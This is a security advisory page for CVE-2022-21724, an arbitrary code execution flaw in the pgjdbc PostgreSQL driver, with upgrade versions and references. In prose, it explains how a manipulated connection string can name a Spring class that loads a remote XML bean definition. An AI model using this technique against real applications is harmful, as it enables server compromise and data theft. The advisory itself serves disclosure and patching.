CVE-2022-21724
Arbitrary Code Execution vulnerability in org.postgresql:postgresql

What is CVE-2022-21724 About?

This vulnerability in pgjdbc allows for arbitrary code execution due to improper validation of plugin class names provided via connection properties. An attacker can specify a malicious class name, typically an out-of-the-box class from frameworks like Spring, to execute arbitrary code. The impact is significant, and exploitation is relatively easy once a connection string can be manipulated.

Affected Software

Technical Details

The `pgjdbc` driver instantiates plugin instances based on class names supplied through various connection properties, such as `authenticationPluginClassName`, `sslhostnameverifier`, `socketFactory`, `sslfactory`, and `sslpasswordcallback`. The critical flaw is that the driver fails to verify if the provided class name actually implements the expected interface before attempting to instantiate it. This oversight allows an attacker to specify any arbitrary class, including classes from common libraries like Spring Framework (e.g., `org.springframework.context.support.ClassPathXmlApplicationContext`). By providing a malicious `socketFactoryArg` alongside a controlled `socketFactory` class, an attacker can trigger the remote loading and execution of attacker-controlled code (e.g., an XML file containing a malicious Spring bean definition) when a connection is established. This example precisely demonstrates Arbitrary Code Execution (ACE) via deserialization or reflective instantiations.

What is the Impact of CVE-2022-21724?

Successful exploitation may allow attackers to execute arbitrary code on the system where the application using pgjdbc is running, potentially leading to full system compromise, data theft, or data manipulation.

What is the Exploitability of CVE-2022-21724?

Exploitation requires the ability to control or manipulate the connection properties (JDBC URL) used by an application to connect to a PostgreSQL database. This could be achieved through various means, such as configuration file access, environment variable injection, or application input that allows for connection string manipulation. No authentication to the database itself is necessarily required for the initial code execution, as the vulnerability lies in the driver's instantiation process. The access is remote if the attacker can influence an application's JDBC URL remotely. The complexity is moderate, as it involves crafting a specific connection string with a suitable gadget class. The main prerequisite is control over the connection URL parameters. Risk factors include applications that expose their database connection configurations or allow user-controlled input to influence these configurations.

What are the Known Public Exploits?

What are the Available Fixes for CVE-2022-21724?

Available Upgrade Options

• org.postgresql:postgresql
  • >9.4.1208, <42.2.25 → Upgrade to 42.2.25
• org.postgresql:postgresql
  • >42.3.0, <42.3.2 → Upgrade to 42.3.2

Additional Resources

• https://www.debian.org/security/2022/dsa-5196
• https://osv.dev/vulnerability/GHSA-v7wg-cpwc-24m4
• https://lists.fedoraproject.org/archives/list/package-announce%40lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS/
• https://lists.debian.org/debian-lts-announce/2022/05/msg00027.html
• https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813
• https://github.com/pgjdbc/pgjdbc/security/advisories/GHSA-v7wg-cpwc-24m4
• https://www.debian.org/security/2022/dsa-5196
• https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/BVEO7BEFXPBVHSPYL3YKQWZI6DYXQLFS
• https://security.netapp.com/advisory/ntap-20220311-0005
• https://github.com/pgjdbc/pgjdbc/commit/f4d0ed69c0b3aae8531d83d6af4c57f22312c813

What are Similar Vulnerabilities to CVE-2022-21724?

Similar Vulnerabilities: CVE-2021-44228 , CVE-2021-45046 , CVE-2022-23305 , CVE-2022-21724 , CVE-2022-29078